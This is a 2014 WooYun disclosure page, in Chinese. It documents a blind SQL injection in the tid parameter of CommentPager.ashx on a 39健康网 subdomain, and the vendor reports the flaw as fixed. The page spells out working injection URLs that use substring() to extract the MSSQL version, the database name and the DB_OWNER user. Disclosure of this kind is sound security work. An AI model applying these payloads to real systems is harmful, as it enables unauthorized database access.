当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064000

漏洞标题:39健康网某站点存在SQL盲注漏洞

相关厂商:39健康网

漏洞作者: 梧桐雨

提交时间:2014-06-07 23:39

修复时间:2014-06-09 14:08

公开时间:2014-06-09 14:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-07: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

MSSQL SQL盲注入

详细说明:

存在注入的站点如下:http://makemoney.39.net/

1.jpg


注入页面:CommentPager.ashx
注入参数:tid
正常情况:

2.jpg


and 1=1
and 1=2返回结果不一:

3.jpg


4.jpg


嗯,用substring()函数来进行盲注吧。
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20@@version),22,4)=%272005%27
返回正常,说明mssql是2005的:

5.jpg


接下来猜database:
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27A%27
返回错误
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27C%27
返回正常,说明数据库第一个字符是C
以此类推:得
database = Comment

漏洞证明:

试试注入user吧。
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%27a%27
返回错误
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%273%27
返回正常,以此类推得:
39_Comment
当前权限:DB_OWNER

修复方案:

过滤。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-06-09 14:07

厂商回复:

感谢梧桐雨的辛勤劳动!

最新状态:

2014-06-09:此站已经处于停滞状态,无人跟进,已经将站点下线

2014-06-09:已修复